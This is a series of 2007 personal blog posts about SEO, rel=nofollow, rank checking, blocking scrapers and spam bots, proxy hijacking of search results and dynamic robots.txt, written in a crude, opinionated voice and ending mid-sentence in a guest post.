I finally decided to put my thoughts in black and white and let people know why I think the Emperor G has no clothes which is why they invented "rel=nofollow" in the first place.
Think about how much we hear about relevance.
Relevant results are all the buzz in the relevance of Google's search results and targeting of AdSense ads so they must be the experts in relevance, right?
OK, if they have such a good lock on relevance then why couldn't Google simply determine that spam links from comments on blogs, forums and wikis had NO relevance to the topic of the post and simply discount those links automatically.
Once you grasp the implications of my last paragraph you'll realize that "rel=nofollow" is bogus.
If you're still not sure, think about this for just a moment with a simple scenario where Grandma posts on her crochet blog about a new crochet pattern and then a spammer spams her blog about Viagra or a bunch of other pharma and off topic crap.
Would we be led to believe that the world's greatest search engine with the best search relevance bar none can't tell that the link and comments about Viagra don't match the content of the blog post and can't automatically discount those links without a "rel=nofollow"?
Apparently not, and here comes "rel=nofollow" and all the FUD and fear mongering about who you link to, who you can sell links or legitimate ads to, and whether or not you can pass link juice or not without the risk being penalized if you don't bend to the will of the same company that ironically makes their billions selling paid links.
Does anyone besides me smell a hand job penalty for paid links?
If Google can't tell that the Viagra ad was off topic on Granny's Crochet blog then how are they detecting paid links?
With all that said I think "rel=nofollow" at a minimum is a good idea just to automatically discount random links from random people posting on blogs, forums and wikis just to take the possible SEO reward out spam. However, that won't stop the spam because the same stupid people that open those emails and go to those websites will still click the links in the spam posts as well so the direct traffic will still be a big enough incentive to continue spamming websites. The only upside is it thwarts their efforts to gain rank in the search engines.
However, if Google's relevance detection, especially with off topic links was really that good, the spam posts never would've been a problem in the first place.
Does anyone smell a rat?
Unfortunately the rat I smell is mixed content sites such as many news sites, forums and blogs with random topics per page that probably caused too many false positives for an algorithm to automatically discard what would appear to be off topic links.
Therefore, the algorithm probably failed and here we are scared into policing ourselves with "rel=nofollow" and every now and then someone caught selling a paid link or something is thrown on the sacrificial altar just to stir some high profile FUD and keep everyone in line.
That's my theory, what do you think?
Wednesday, October 03, 2007
Debunking the FUD around "rel=nofollow"
Posted by
IncrediBILL
at
10/03/2007 11:29:00 PM
3
comments
Page Position Checking SEO Tools Waste Time and Money
The SEO community is always promoting page position checking tools all over the place but those tools are hardly useful and just part of the harmful hype that constantly surrounds the SEO business. Worse yet, they burn up your money paying for crap that most ultimately discard, waste time initializing the software per site, burn more time and bandwidth running them, and worse yet, these tools are against the Google Webmaster Guidelines. Since most SEO's don't give a rat's ass about doing things that are against the Google Webmaster Guidelines, until their sites get penalized in Google, we'll focus on why it's a waste of time and money.
Why would you possibly need a page rank checker?
- Customer wants a position report.
- Keeping an eye on the competition's ranking.
- Don't know how to interpret traffic analytics.
- Because everyone else does it.
There must be a motivating factor driving all of this rank checking mania, we'll call it money, because it certainly isn't common sense. I've never hired outside SEO but I'll bet customers get charged extra for these silly reports to cover the costs of the software or service they pay to create those reports.
The customer probably didn't know he needed a position report until some SEO claimed "Top 10 position guaranteed!" or something equally as silly which put that thought in his head in the first place. Now that the customer has that idea about a single position you need to either educate them about why it's garbage or spend time and money pounding the search engines running reports that put your money where your mouth is.
I would probably opt to educate the customer about what really matters and show increases in traffic and conversions and skip right past the silly rank checking. If you want to spend money wisely and help the customer spend it wisely as well invest in really good analytics and skip directly past page rank checking.
Unfortunately, we all know some customers will be fixated on ranking #1 for some term and won't see or appreciate the big picture in overall traffic improvements and will have a single-minded focus on that single keyword. Those are customers I would walk away from because anything short of achieving that goal and they'll never be happy and misery flows downhill. Run, do not walk, away from this situation.
Keeping an eye on the competition's ranking.
Considering that the bulk of the traffic usually comes from less than 30 keyword phrases (ok, I just picked 30 as a random number for discussion, your mileage may vary) it's pretty easy to eyeball these phrases in the search engines every now and then just to get an idea what the competitive landscape looks like. Spending tons of money on software just to track this competitive analysis is also silly because you know for a fact that when you improve your traffic and conversions on certain terms you're taking them away from someone. Likewise, if you lose traffic and conversions on certain terms you can typically assume someone is taking that traffic away from you and you can easily eyeball that term in the search engine to see where it went.
Don't know how to interpret traffic analytics.
Anyone that has ever run a web site for any length of time will realize that everything you'll ever need to know can be found in your log file analysis. If you rank well for a keyword or phrase you'll be getting a lot of traffic on that term and if you don't rank well, or at all, you won't get traffic for that term. Pretty simple to figure out what terms rank because everything that doesn't show up in your log files either doesn't rank or if it did rank, doesn't drive traffic because people don't search for that phrase so it's meaningless.
Learning how to properly understand the traffic to your site can seem a little overwhelming at first because not all traffic is good traffic. The easiest way to really understand where to focus your energy is tracking conversions to see which terms bring in the most customers that convert and then expand your search engine marketing around what I like to call "the phrase that pays".
Usually it's a lot of phrases but that's a different discussion for a different day.
I always recommend a combination of server side and service provider analysis tools as you need something that can analyze your raw server log files and it never hurts to use something free, especially if you're on a budget or not terribly technical, like Google Analytics as it's easy to install. Additionally, consider looking into some of the information provided by Google Webmaster Tools.
The main difference between a javascript-based analytics tool like Google Analytics and server side stats is that the javascript-based tools tend to only show real humans surfing the web. All the 'bots that crawl don't tend to be javascript capable which is why the two tools will show a huge discrepancy between your raw server logs and analytics services. Don't forget that many surfers disable javascript and run various ad blocking software which may also block your analytics tracker for privacy reasons. Therefore, the truth about your traffic lies somewhere in the middle of the raw server logs and a hosted analytics service but you usually can't go wrong basing decisions on the results of an analytics service.
Because everyone else does it.
That's not even a reason, that's an excuse.
This article wouldn't be complete if I didn't admit once upon a time, a long time ago, even I fell for the page position tracking trap and did it for almost 6 months before I realized I was wasting my time. Worrying about minor fluctuations are silly because the search engines are constantly in flux and your site may go up or down a little on various terms all the time, it's natural. However, if your site moves up or down a substantial amount on a term, your analytics will point this out just as well as the rank checker so it's completely redundant and doing the same job twice is obviously a waste of time and money.
That's why I abandoned checking my page positions years ago, increased my traffic more than I ever did looking at those silly reports, and both made and saved a lot of money in the process.
Summary
Skip the rank position checking except for manually eyeballing the search results every now and then for some top terms and invest heavily in analytics.
You'll be happier, you'll be focused on what really gets better results and you won't feel like a schmuck.
Posted by
IncrediBILL
at
10/03/2007 06:13:00 PM
3
comments
Wednesday, September 26, 2007
Cyberspider Crap-of-the-Day Bot Award
No clue what this spider does as it only asked for my home page but I know what it doesn't do, it doesn't ask for robots.txt.
Here's the 411 on this bad bot:
81.56.161.126 [veigy.globalitsolution.com.] requested 1 pages as "cyberspider"These crappy crawlers just keep coming...
Posted by
IncrediBILL
at
9/26/2007 12:21:00 PM
7
comments
Double iPod Storage with iDoubler from Analog Magic
Found out an old friend of mine who's a real smart guy wrote some cool software to compress music files on an iPod. This iPod software tool of his called iDoubler uses some real high tech audio analysis processing to reduce the size of MP3 files and others in half, without compromising quality, thus doubling the amount of storage on your iPod or other music players.
Most of the music stored on my Zen is in MP3 format so even if I didn't put twice as many songs on the Zen, using iDoubler would cut the upload time in half.
Anyway, I just thought that it would be worth mentioning iDoubler for the rest of you out there that may, like me, still have a music player with 5GB or less so we can jam yet more into our old trusty music players until prices and sizes drop on those fancy 30GB devices.
Posted by
IncrediBILL
at
9/26/2007 11:26:00 AM
0
comments
Tuesday, September 25, 2007
CONTACT US Form Spammers STILL STUMPED!
It's been about 2 months since I implemented my last anti-spam form submit code and surprisingly the spammers were stopped dead this time and don't seem to have a clue how to get around it.
Without giving away all the secrets so the little pecker heads don't read this and figure it out, it's a combination of javascript in the browser and some server side tracking algorithms that seem to be able to detect the spam scripts very accurately.
Looking at my log today the spammers may have just given up on my site because the ton of failed posts no longer appears.
Here's a few highlights of the last anti-spam patch:
- No captcha that a human must type as the javascript itself is the captcha
- Browser and user agent validation
- Data center blocking
- Behavior profiling
The way the javascript is written it's nothing that happens the exact same way twice and the results are always different so I'm sure they gave up trying after a bit because the first wrong answer submitted and I froze the form from being used again. This stopped the spammers from hacking at the code as one wrong move and they were locked out for 24 hours before they could attempt it again.
Unfortunately, I might've locked out a couple of humans with javascript disabled as well but I can't tell as the volume of form submissions looks normal, no obvious decline, and the page clearly states that javascript must be enabled in order for the form to work.
I think a few minor casualties are acceptable for my peace of mind and less work cleaning up spammers messes.
Bye bye spammers, nice know'n ya!
Posted by
IncrediBILL
at
9/25/2007 03:36:00 PM
7
comments
Tuesday, September 04, 2007
Why FireFox is Misguidedly Blocked.
Went to read a blog this morning and was instead rudely redirected to some page with a bunch of hysterical bullshit about Why FireFox is Blocked.
The funny part is that in principle I agree with everything the page says about ad blocking being content theft but going to war against all FireFox users over this is fucking stupid.
People run ad blockers in Internet Explorer, why not block them too?
Most of the traffic is Internet Explorer so cutting of your traffic is stupid.
Why aren't they rallying against Norton Firewall which blocks all the same things by default?
That's another easy answer, because Norton Firewall users are a substantial amount of the traffic too but they can't easily detect a firewall. However, the FireFox user agent is an easy target to make a stand and piss off all the FireFox users and people are buying into this hype which is idiotic.
Hell, I'd suspect there are more people running ad blocking at the firewall level than there are copies of FireFox in actual use.
Will I do as they ask and go yell at Mozilla to take AdBlock Plus off the plug-in list?
Fuck no, it's fucking stupid.
However, what I might do is continue working on some ad blocking buster code that I started tinkering with because of Norton Firewall and ad blocking firewalls in general.
Shouldn't be that difficult to embed some javascript in the page that checks to see if Google AdSense created the iFrames for the ads or if the banners were actually loaded and punt the page elsewhere to a nice message telling people nicely:
YOUR BROWSER IS BLOCKING CONTENT FROM THIS WEBSITE.Worded purposely to sidestep even discussing the fact that the blocked content was ads so it doesn't call direct attention to the ads and shouldn't violate the AdSense T&Cs.
PLEASE DISABLE BLOCKING TECHNOLOGY SO OUR PAGES WILL DISPLAY CORRECTLY.
You could just turn off javascript to stop any ad block checking but then the site navigation won't work because they're both in the same file.
Cute, eh?
Additionally, server side embedded ads seem to still work just fine so as long as you aren't serving up some 3rd party ads you can still show the ads.
Yes, your embedded ads COULD be blocked but the current filter technology requires a specific path or file name so as long as the image names vary constantly per banner and they appear to be served from the root path of the web site it's pretty hard to filter out with the existing technology.
The easiest way to defeat ad blockers which I've experimented with in the past is to simply make all the code server side. I once experimented with CJ's code by downloading the images to the server first and embedding them into the page directly, then redirecting clicks to the proper tracking location. The only 2 issues is that the impression tracking and 3rd party cookies didn't work well in that scheme, but it's obvious to me that a server side work around is possible that defeats all the ad blockers.
Don't expect to see server side code anytime soon though as most people operating a web site simply aren't capable of installing the code unless it comes pre-packaged as a blog or CMS module that can virtually install itself.
Remember, it's not a war on FireFox, it's a war on AD BLOCKERS, so get over the fact that FireFox has a plug-in, stop stupidly penalizing FireFox users, and start dealing with the root of the problem which is the blocking technology itself. Your ads can fly under ad blocking radar or stop visitors that don't download ads, your choice, but deal with the problem and not taking pot shots at a random poster child which in this case is FireFox.
Posted by
IncrediBILL
at
9/04/2007 11:48:00 AM
37
comments
Thursday, August 23, 2007
Proxy Phishing Warning - Avoid Proxies!
Here's another reason to avoid proxy servers as McAfee SiteAdvisor has been popping up warnings about potential phishing via these seemingly "harmless" proxy sites.
Maybe phishing is one of the real reasons behind the sudden proliferation of new proxy sites and not just so kids and workers can bypass internet security.
Maybe the real purpose of many of the sites popping up every few minutes is to lure unsuspecting victims into using their passwords and other personal information and collecting them for nefarious purposes.
It's also another possible reason that the proxy hacking/hijacking is being done as a means to purposely direct people to sites they may be members of, by hijacking the page in Google as a means to get you to login via their servers.
Some of the newer proxy sites I've seen attempting to hijack some of my pages lately have a very low profile, such as "http://000a.com/www.mysite.com" and don't even frame the page to give you any indication that you're even using a proxy other than the URL.
Everything is starting to add up to a very serious threat for novice internet users that can't tell they're even being spoofed.
I didn't like proxy sites before and now I think they should just be abolished because the risks are too high for site owners and visitors alike.
When it comes to proxy sites just play it safe and avoid them at all cost.
Posted by
IncrediBILL
at
8/23/2007 03:33:00 PM
6
comments
Labels: Phishing
State of Spider Verification One Year Later
A year ago at SES in San Jose we made a big fuss about not being able to validate if the spiders were truly coming from the search engines or being spoofed.
At the time some people were maintaining lists of known valid spider IP addresses while others used to authorize entire ranges of IPs for various datacenters just in case they used new IPs which frequently happened.
Finally the big 4 search engines have all gotten on board implementing round trip DNS checking for spider verification with Google leading the pack back in September '06 right on the heels of SES San Jose.
Here's the implementation timeline:
08/06/06 - How to verify Googlebot on Google's Webmaster Central Blog
11/29/06 - Ask has round trip DNS support as well. Not sure of the exact date but it appears Ask beat out Microsoft based on a post on Matt Cutts Blog. I remember them mentioning this at one of the conferences last year, definitely PubCon at a minimum. If someone from Ask wants to give us an official date that would be nice.
11/29/06 - Search robots in disguise on Live Search team's blog. I remember when I asked the search engine panel at PubCon when they were going to follow Google's lead on this issue the Live Search guy's hand shot right up and said they already had it done.
Look at how quick and responsive 3 search engines were to webmaster complaints about spoofing issues.
...and barely getting it done before SES San Jose '07
Better late then never and it would probably have been a big embarrassment had another year passed without keeping up with the competition.
Other spiders that appear to have implemented round trip DNS validation, to name a few off the top of my head, include Exabot, Furlbot, Twiceler, VoilaBot, even a few aggregators like BecomeBot and tailrank.com and a whole lot more so it's catching on.
Then you have stragglers like Gigabot that don't even bother setting any reverse DNS whatsoever and you have to do a whois on the IP address just to see if the IP block is assigned to their company or not. Come on people, get with the the program!
Obviously we still have a few search engines that need to catch up but at least all the major players can now be verified and a simple PHP script using round trip DNS verification can stop proxy hijackers and scrapers that spoof the search engines.
Posted by
IncrediBILL
at
8/23/2007 01:32:00 PM
2
comments
Wednesday, August 22, 2007
Google Dance 7 Kicked Butt
Did my annual pilgrimage to the Google Dance event last night that's associated with SES San Jose and had a pretty good time.
The Google Dance never fails to impress me as Google knows how to throw one hell of a party with enough food and drink to feed a small army (which it was, huge crowd) and some DJ's rocking the house.
Just to become a typical name dropping whore, in no particular order, I'll tell you I ran into Brett Tabke, Danny Sullivan, Matt Cutts, John Andrews, Jon Glick (become.com), Bob, Phil, Evan (Google Webspam guy, works with Matt), and a bunch of other people I can't remember off the top of my head. Earlier in the day in the SES exhibit hall had a nice chat with Brian Prince of BOTW and Lawrence Coburn of RateitAll and I spotted ShoeMoney hanging out at the WebmasterRadio booth but didn't get a chance to say "Hi!" even. Martinibuster was supposedly running around the Google Dance but we didn't spot him.
Everyone was talking about the highs and lows of the last Google update as many people got by unscathed. Some, like myself, are experiencing phenomenal traffic improvements but everyone had a story of someone they knew that took a swan dive and is now in the bottom of the Google barrel.
The hot topic of the day which was quite the buzz at the Google Dance was an SES session about paid links where some described it at a near revolt (riot) of the masses against Matt Cutt's stating the Google company line about paid links. Play the video on SER, pretty funny.
I hate to be a complainer because it was a great party but I have a couple of minor gripes that maybe Google can address next year:
- Put some trash cans near the food and beverage stations. We had to walk all over the place trying to find trash cans, which is no fun with a busted up toe, just so we could be good guests and not litter the place.
- SUPPLY SOME TOOTHPICKS! Maybe you had them, but I sure couldn't find them, and spent half the night trying to get a stuck kernel of corn out from between my teeth.
Posted by
IncrediBILL
at
8/22/2007 10:27:00 AM
1 comments
Thursday, August 16, 2007
Dan Thies Lights Fire Under Google for Proxy Hijacking
I've discussed Google proxy hijacking many times before in this very blog, even joked about it.
Now Dan Thies has done an excellent post about the problem appropriately entitled "Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs".
Dan's post is complete with visual aids for those having trouble grasping how it works and even links to some sites with PHP code to help alleviate the problem.
Read a detailed account of just how easily it is to have the deadly combination of Google and a proxy server turn your website's ranking in Google literally upside down as you get a duplicate content penalty for your own pages, and worse!
Run, do not walk, to read Dan's post and tell all your friends as this information could save many websites from a sudden and untimely demise in Google.
Posted by
IncrediBILL
at
8/16/2007 03:20:00 PM
6
comments
Labels: Proxy Hijacking
Thursday, August 09, 2007
CONTACT US Form Spammers Monitor Submit Results!
I have one CONTACT US form on a website that I leave less protected than other forms just to allow customers with their browser security dialed up tight to drop a line without getting caught in anti-spam snares.
Mind you, this page only sends an email to ME, nothing public, nothing nobody will ever see as I sure as hell won't look at the spam other to delete it, so it gives them ZERO value for their efforts, yet they persist.
So in the beginning there was a small trickle of spam on this form that started to escalate.
The first thing I did ages ago was I changed to the form to require a POST just to thwart them from their simple GET's dumping junk.
Eventually they switched to use a POST, but that means someone was monitoring response codes, but WHY?
The trickle of spam eventually came back.
So I changed a couple of fields just to alter the process and break their auto-spam tool.
A long nice quite period but obviously someone is watching and they adapted yet again.
Fine, so I made it a requirement that the page rejected the post unless they had accessed some other page on my site first, which would be a normal user thing.
This caused a longer period of blissful silence.
Then here comes the spam yet AGAIN!
OK, fine, let's try embedding something in the page unique per visitor so if you don't get the CONTACT US page first, and use that parameter, it will reject the submit.
This just blew my fucking mind when a few days later they adapted to first get the page, get all parameters from the form, then POST the page!
OK, now we know someone is fucking watching this page...
Fine.
I made a change that you can't see in the HTML, it's all server side, knock your fucking socks off trying to adapt this time.
I still don't see why the spammers would bother as they're just wasting time.
Nobody will ever see their spams, NEVER EVER, but I can play this cat and mouse game as long as they can.
All this trouble just because I didn't want to annoy visitors with a captcha on a single page, or require cookies or javascript to be enabled.
If they push me too hard the captcha gets installed.
FYI, I'm watching the someone trying to fix their form post to my site as I'm writing this. They've made about 10 attempts now and it's still not getting through. This must be making him nuts as I don't give them any clues why the submit isn't working except a generic error that the submit failed and please try again!
Let's see what happens next...
UPDATE: The spambots were hammering away at that forum trying to figure out what I did for days with literally hundreds of post attempts from a couple of IPs. Probably the spambot herder trying to figure out my latest anti-spam hack. Then it stopped, not a single POST from those sources and it's back to normal with only real posts from humans.
Posted by
IncrediBILL
at
8/09/2007 02:06:00 PM
11
comments
Sunday, August 05, 2007
Yahoo's RSS Feed Refresh is SLOW!
One of my sites has a dynamic RSS feed and it sends a refresh ping to Yahoo every time new content is added to the feed. Sometimes the content is added slowly over the course of the day, sometimes content is added more rapidly and new items are added to the feed almost back to back.
The code managing the feed is simple in that it simply updates the RSS feed and pings all the refresh services in real time as the data becomes available.
If you add more than one item in a minute or two what does Yahoo say?
Too soon for what?Refresh failed: Too soon http://www.mysite.com/myfeed.xml
Too soon for more new content?
Too soon for your crappy refresh servers to keep pace with reality.
Why don't you just queue it up because I've already told you that the content you previously had is already OUT OF DATE but noooooooo, it's TOO SOON to refresh because we're Yahoo and we have silly rules in place to protect our fragile servers.
Well guess what?
You need a new error called: "TOO LATE!" as your version of the feed is older than everyone else's that could keep up.
As a matter of fact I thought I'd try it ONE MORE TIME as I figured in the time it took to type this blog post that Yahoo would've allowed the RSS feed update by now so I manually pinged their server and you guessed it "TOO SOON! TOO SOON! WE'RE YAHOO AND WE CAN'T KEEP UP!"
Sheesh.
Posted by
IncrediBILL
at
8/05/2007 05:23:00 PM
2
comments
Tuesday, July 31, 2007
Attempted Distributed Scrape from SAIX.net
This is the kind of scrape attack I warn my bot blocking comrades in arms that they would probably miss because it's distributed over multiple IP addresses. Had the scraper not left the default user agent "Java/1.6.0_02" most of the anti-scrapers would be helpless against this type of scrape.
Here's a sample of the activity:
198.54.202.246 [ctb-cache7-vif1.saix.net.] requested 3 pages as "Java/1.6.0_02"This is a prime example of why standard bot blocking that only takes a single IP address would fail because these are all proxy servers that claim to be forwarding on behalf of 41.240.133.235 [dsl-240-133-235.telkomadsl.co.za].
198.54.202.194 [ctb-cache4-vif1.saix.net.] requested 1 pages as "Java/1.6.0_02"
196.25.255.210 [rba-cache2-vif0.saix.net.] requested 3 pages as "Java/1.6.0_02"
198.54.202.195 [ctb-cache5-vif1.saix.net.] requested 3 pages as "Java/1.6.0_02"
196.25.255.218 [rrba-ip-pcache-6-vif0.saix.net.] requested 4 pages as "Java/1.6.0_02"
198.54.202.214 [rrba-ip-pcache-5-vif1.saix.net.] requested 4 pages as "Java/1.6.0_02"
196.25.255.195 [ctb-cache5-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
198.54.202.210 [rba-cache2-vif1.saix.net.] requested 2 pages as "Java/1.6.0_02"
198.54.202.218 [rrba-ip-pcache-6-vif1.saix.net.] requested 2 pages as "Java/1.6.0_02"
196.25.255.214 [rrba-ip-pcache-5-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
198.54.202.234 [rba-cache1-vif0.saix.net.] requested 3 pages as "Java/1.6.0_02"
196.25.255.194 [ctb-cache4-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
196.25.255.250 [ctb-cache8-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
Assuming these script kiddies fix the default UA all that needs to be done to stop them is track access based on the proxy forward IP, which I do, which makes stopping this kind of nonsense childs play.
FYI, before anyone asks stupid questions like "How do you know it was a scraper?" it's because of the access of my pages names in sequential alphabetical order. Other than being distributed among many IPs via the SAIX caching proxy, which could be hard to identify via a log file review, the rest looked like it was amateur hour at the scraping faire.
This is why I tell people post-mortem Apache log file reviews simply don't work because there is insufficient information to identify things that my code easily catches in real time.
Posted by
IncrediBILL
at
7/31/2007 06:01:00 PM
10
comments
Saturday, July 28, 2007
Keniki Has Meltdown on Matt's Blog
The comments on most blogs aren't that amusing in and of themselves until one of the blog posters goes right off the deep end and has a meltdown.
The recipient of this meltdown and flamefest is no less than good old Matt Cutts himself.
First Matt posts that he's booted someone from his blog and Keniki chimed in about dreaming of being the recipient of such action:
keniki Said,OK, how does one "quit the net"?
July 20, 2007 @ 4:23 pm
I tuned in thinking it was probably me. To be honest I’d welcome it. Its not been easy seeing one of my sites ripped apart by proxy servers , scraped bowled and hijacked and it sent me into to a over the edge at times.
Matt I think you should apply the same filter to Keniki. I am probably going to quit the net anyway and you should delete my stuff, I was pretty pissed when I wrote most of it.
Yank the cables off the back of the computer?
Smash the wireless Centrino chip in the laptop?
Then a couple of days later Keniki goes full tilt:
keniki Said,Immediately followed by:
July 27, 2007 @ 9:31 pm
[...] FUCK that google the site also showed hidden content and deceptive redirects. It seems rules do not apply if you show google adsense, the passport of spam.
keniki Said,Damn!
July 27, 2007 @ 9:44 pm
Its all bullshit isn’t it google, you couldn’t give a stuff about quality results its all about the money now isn’t it. Your spam team are told not to touch results that carry google ads.
Someone woke up with their knickers in a knot didn't they!
Looks like a self-fulfilling prophecy in action about having Matt delete your posts.
I must say I'm shocked that people would be so rude and vent at a company employee that actually tries to help people on his own time.
This is a prime example why most company employees don't publicly admit, not on a blog anyway, who they work for as it's just too dangerous to paint such a bullseye on your back for anyone and everyone to come and attack you just for being a small cog in a giant wheel.
Guess we'll just have to wait and see how this little melodrama plays out.
Anyone giving Vegas odds on whether Matt boots Keniki?
Posted by
IncrediBILL
at
7/28/2007 04:36:00 PM
14
comments
Wednesday, July 25, 2007
1-More Scraper Tool
These scrapers are like locusts and here's another $19 pile of crap called 1-More Scanner that bounced off one of my sites today.
The user agent was "1-More Scanner v1.25" and it claims it can "Download images, MP3 or any file from any site!" which is an awfully big claim for something that didn't get a single page.
The only amusing part is a feature for "Proxy-support" which will just help me update my proxy list when I see it attempt to crawl via a bunch of proxy IPs, thanks for the help!
Posted by
IncrediBILL
at
7/25/2007 05:47:00 PM
3
comments
Labels: Scrapers
Tuesday, July 24, 2007
Site Scraping for DreamWeaver
Now there's a DreamWeaver plug-in that makes scraping easy for dummies.
If you have no web skills just use Site Import and rip off an entire site at once.
Why learn how to design a site, create your own content, or any of that nonsense when you can just quickly and rapidly download someone's site instead?
This is cute:
That's a nice theory until a bot blocker shuts your import down in mid-scrape.No limit retrieval
With Site Import 2.0 you can import as many pages from a site as you'd like – no more limits!
And my personal fave:
I'm not sure that stealing is a time-honored tradition even if imitation is the sincerest form of flattery.Learn from the pros
Learning by example is a time-honored tradition on the Web
And last but not least:
Grab your ankles and bend over while it extracts hundreds of thousands of pages from your database-driven site and pushes you over your monthly bandwidth allotment.Dynamic and database-driven sites, too!
Site Import works its magic with all kinds of Web sites – including those developed with ASP, ColdFusion, PHP or even .NET.
Don't know what user agent they use for this process but I'm pretty sure my sites (not this blog) are pretty safe from this shit except for the first few pages scraped while determining it's not a human at the controls.
Posted by
IncrediBILL
at
7/24/2007 03:40:00 PM
6
comments
Labels: Scrapers
FuckedCompany Died in June
About a year ago I reported that FuckedCompany was fucked, but it suddenly seemed to have a little more gas left in it and they started posting regularly again. However, it looks like that gas ran out as they quit updating the site on 6/8/2007 so it's probably dead for good this time.
FuckedCompany's site owner Pud, of AdBrite fame, is still posting on his blog but it appears he's given up on FuckedCompany, so I guess I'll give up on it as well.
Guess it's time to delete that bookmark.
See ya!
Posted by
IncrediBILL
at
7/24/2007 01:20:00 PM
1 comments
Sunday, July 15, 2007
Rehabilitating Massive Amounts of 404 Errors
One of my sites used to get as many as 100K 404 errors in a single month.
Leading cause of this problem?
SEARCH ENGINES!
That's correct, the #1 leading cause was search engines but they were just a symptom of a bigger problem and not the root cause. Sloppy scrapers and crappy wannabe search engines and directories that mucked up the URLs were the true culprit. Then the major search engines crawled these sloppy sites, indexed those mucked up URLs, and that's when all the 404 fun starts.
Obviously my bot blocking stopped the scraping so the source of the mucked up URLs eventually faded away but that still left a serious amount of junk in the search engine crawler queues to clean up.
Some of the links had everything from an ellipsis in the middle to fragments of a javascript OnClick() appended to the link. My personal favorites were the Windows script kiddies that don't realize Linux servers are case sensitive and converted all my links to lower case. There were lots of other errors but you kind of get the point of what kind of damage can be inflicted with homemade crawlers written by incompetent assholes.
There were obvious solutions to use to clean up the search engines but those didn't address the immediate issue of visitors hitting 404 errors. Since I didn't want any actual visitors hitting these mucked up links to get a 404 error page, I set about logging and redirecting all the 404 errors that could be recovered to the actual intended page. Many of the mucked up links contained enough of the original path that I could identify the original page and put the request back where it belonged. Over a period of time the corrections began to stick in the search engines and eventually the 404 responses dwindled to a much smaller and manageable number.
Just another reason to be a diligent in blocking unwanted crawlers and scrapers as nothing good ever came from letting them crawl.
Posted by
IncrediBILL
at
7/15/2007 03:58:00 PM
0
comments
Wednesday, July 11, 2007
Are Domain Parks Playing Unfairly in Google?
John Andrews has been writing about the domainers becoming publishers:
The next wave of the competitive internet has arrrived, and it’s driven by the Domainers. No, not parked pages, and no, not typo squatters. Domainers as publishers.After reading the post I was thinking "So what? They'll still have to fight for SE traffic just like everyone else except the added advantage of the premium domain names which will get type-in traffic and maybe rank a little better."
Well, I was sorely mistaken that it would still be even close to a level playing field as the domainers are using their domain park network to generate many thousands of backlinks in Google and Yahoo.
My initial investigation of all these backlinks in Google and Yahoo showed different links in the live sites I visited vs. Google or Yahoo cache which means they might be cloaking. The page cache always had specific links to their publisher sites on parked pages when the search engines crawled, but it'll be hard to prove it wasn't coincidence unless this situation persists over time.
The real question is why do the search engines index domain park sites in the first place?
The lame answer you'll get is "in case they turn into an actual website".
OK, crawl the sites, fine, but why should those parked pages show up in the search results or be allowed to influence page rank before they become an actual site of value?
We all know the an$wer to that que$tion a$ well.
Posted by
IncrediBILL
at
7/11/2007 12:52:00 PM
2
comments
Proxy Hijacking Humor
Instead of all the serious posts about Google Proxy Hijacking it's time for a little bit of humor, very little, my apologies in advance.
Riddle:
Q: What do you call thousands of PhD's that can't stop simple proxy hijacking of your website?Knock Knock Joke:
A: Google!
a: KNOCK KNOCK!Brain Teaser:
b: Who's there?
a: Proxy!
b: Proxy who?
a: Proxy who Google crawls through to hijack your site!
What does the following URL represent in Google SERPs?
http://someproxysite.com/nph-page.pl/000000A/http/www.airplane.com
Answer: If you said "Airplane Hijacking" you are correct!
And now, a sad light bulb joke:
Q: How many proxy sites does it take to screw in a light bulb?More airplane humor:
A: None. Proxy sites get Google to hijack a light bulb that's already screwed in.
Q: What's the difference between a website and a 747?Last but not least...
A: Proxy sites can't get Google to hijack a 747!
Q: What do you call a good proxy site?Ok, you can groan, boo and hiss now.
A: Offline.
Posted by
IncrediBILL
at
7/11/2007 12:10:00 PM
1 comments
Labels: Proxy Hijacking
Sunday, July 08, 2007
Dynamic Robots.txt is NOT Cloaking!
If I read just one more post that claims using dynamic robots.txt files is a form of CLOAKING it might be enough to drive me so far over the edge that it would make "going postal" look pale by comparison.
For the last time, I'm going to explain why it's NOT CLOAKING to the mental midgets that keep clinging to this belief so they will stop this idiotic chant once and for all.
Cloaking is a deceptive practice used to trick visitors into clicking on links in the search engine and then showing the visitor something else altogether, a bait and switch practice. Technically speaking, cloaking is a process where you to show specific page content to a search engine that crawls and indexes your site and show different content to people that visit your site via those search results from that search engine.
Robots.txt files are never indexed in a search engine, therefore they will never appear in the search results for that search engine, therefore a human will never see robots.txt in the search engine, click on it, and see a different result on your website.
See? NO FUCKING CLOAKING INVOLVED!
Since the robots.txt file is only for robots, and humans shouldn't be looking at your robots.txt file in the first place, then showing the human "Disallow: \" is perfectly valid although you may show an actual robot other things as the human isn't allowed to crawl.
Let's face it, some of the stuff in our robots.txt file might be information we don't want people looking at or hacking around as it's just that: PRIVATE.
Additionally, robots.txt tells all of the other scrapers and various bad bots what user agents are allowed so if you're allowing some less than secure bot to crawl your site, the scrapers can adapt to that user agent to gain unfettered crawl access.
Dynamic robots.txt is ultimately about security, it's not about cloaking, and nosy people or unauthorized bots that look at robots.txt are sometimes instantly flagged as denied and blocked from further site access so keep your nose out and you won't have any problems.
If you still think it's cloaking, consider becoming a temple priest for the goddess Hathor as a career in logical endeavors will probably be too elusive.
Posted by
IncrediBILL
at
7/08/2007 10:52:00 PM
71
comments
Saturday, July 07, 2007
Too Much FyberSpider In My Site's Diet
Found this FyberSpider thing that used to crawl from a Comcast address and has apparently grown up and is crawling from a real dedicated server now.
The ip was 69.36.5.45 and the reverse DNS claims to be server.fybersearch.net and sure enough there something called FyberSearch with what appears to be a functional search page. The results actually appear to be populated with data collected from their crawl, trade secret, don't ask.
69.36.5.45 "GET /robots.txt HTTP/1.0" "Python-urllib/1.15"Here's the data center info if you want to block it:
69.36.5.45 "GET / HTTP/1.0" "FyberSpider"
OrgName: JTL Networks Inc.The search page has issues finding words in the one page I allowed to be indexed so I'm not terribly impressed, NEXT!
NetRange: 69.36.0.0 - 69.36.15.255
Posted by
IncrediBILL
at
7/07/2007 01:43:00 PM
3
comments
Thursday, July 05, 2007
Al Gore's Son Arrested in Harrowing Hybrid Hijinx
I've never let anyone else post a guest article here before but this is just so true and so funny it needed to be shared with my readers.
Enjoy.
Guest post by Larry.
so al gore's son got arrested. again. the story has one detail that is so unbelievable that they should probably throw the entire case out.
is it unbelievable that al gore's son was arrested?
